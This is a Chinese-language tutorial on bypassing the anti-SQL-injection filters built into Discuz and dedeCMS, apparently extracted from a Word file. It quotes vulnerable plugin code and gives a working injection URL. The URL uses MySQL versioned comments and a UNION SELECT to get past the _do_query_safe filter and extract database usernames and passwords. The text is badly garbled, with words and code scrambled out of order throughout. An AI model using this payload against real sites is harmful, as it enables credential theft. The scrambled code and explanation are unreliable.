几种通用防注入程序绕过方法.doc

几种通用防注入程序绕过方法0×00前言等,本篇Discuz、dedeCMS目前主流的CMS系统当中都会内置一些防注入的程序,例如主要介绍绕过方法。×01Discuz防注入原理例,来详细说明绕过方法。最近爆出的一个插件的注入漏洞为这里以Discuz函getGoods中的第29行漏洞本身很简单,存在于/source/plugin/v63shop/,代码如下所示functiongetGoods($id){1from*$query=DB::query(‘select2'.$id);=`id`'‘.DB::table(‘v63_goods').where$goods=DB::fetch($query);3',$goods['endtime']);‘Y-m-d$goods['endtime2']=date(4=$goods['price'];$goods['price2']5==2){if($goods['sort']67-m-d$goods['endtime2']=date(‘YH:i:s',$goods['endtime']);$query=DB::query(“select*from“.DB::table(‘v63_pm').”wheregid='$goods[id]‘orderbyid8desc“);$last=DB::fetch($query);9if(is_array($last)){10$goods['price']=$last['chujia'];11$goods['uid']=$last['uid'];12$goods['username']=$last['username'];13$goods['pm']=$last;14if(time()+600>$goods['endtime']){15$goods['endtime']=$last[time]+600;16$goods['endtime2']=date(‘Y-m-d17H:i:s',$last[time]+600);}18}19}20return$goods;21}22触发漏洞的入口点在/source/plugin/v63shop/,如图所示:求触发漏洞了,如图所示:,如图不过程序内置了一个_do_query_safe函示:的执行,它会对以下关键字做过滤,如图所数函_do_query_safe()这里跟踪一下?以会被过滤掉。select,所url中出现了union因为我们的绕过方法:url的一个特性绕过_do_query_safe函数过滤,提交如下这里利用Mysqlhttp://localhost/discuzx2/?id=v63shop:goods&pac=info&gid=1/*!50000select*/and1=2union1from1,2,3,4,5,6,concat(user,0×23,password),8,9,10,11,12,,然后保存在$clean/**/这里我们跟踪一下,绕过的具体过程。它会将中间的量中,其值为`id`wherepre_v63_goodsselect*from/**/union1=2=1and1from1,2,3,4,5,6,concat(user,0×23,password),8,9,10,11,12,$clean也将再进一步跟踪,它会/**/去掉,然对,如图所示值,如图所示此时$clean函数过滤,成功注入,截图_do_query_safe$clean此时变量中不在含有危险字符串,绕过如下:×.,在/config/,如图所示。0认被设置为,重点关注这一点$_config['security']['querysafe']['afullnote']这里默原因,如图所示:这里跟踪一下失败的中$clean中的会将函此时观察一下变量,_do_query_safe($sql)数/**/内容去掉,然后存到,如图所示:下面,的值都一样。,$clean其实,程序执行到这里跟Discuz如图所示:为空,,所以这里不会替换$_config['security']['querysafe']['afullnote']='0'/**/因为前面提到:中是否会出现“/*”,如图所示并且它在后面会判断$clean所以注入失败。绕过方法'abc'***@a=,来为变量赋值。这里为了合法当中,定义变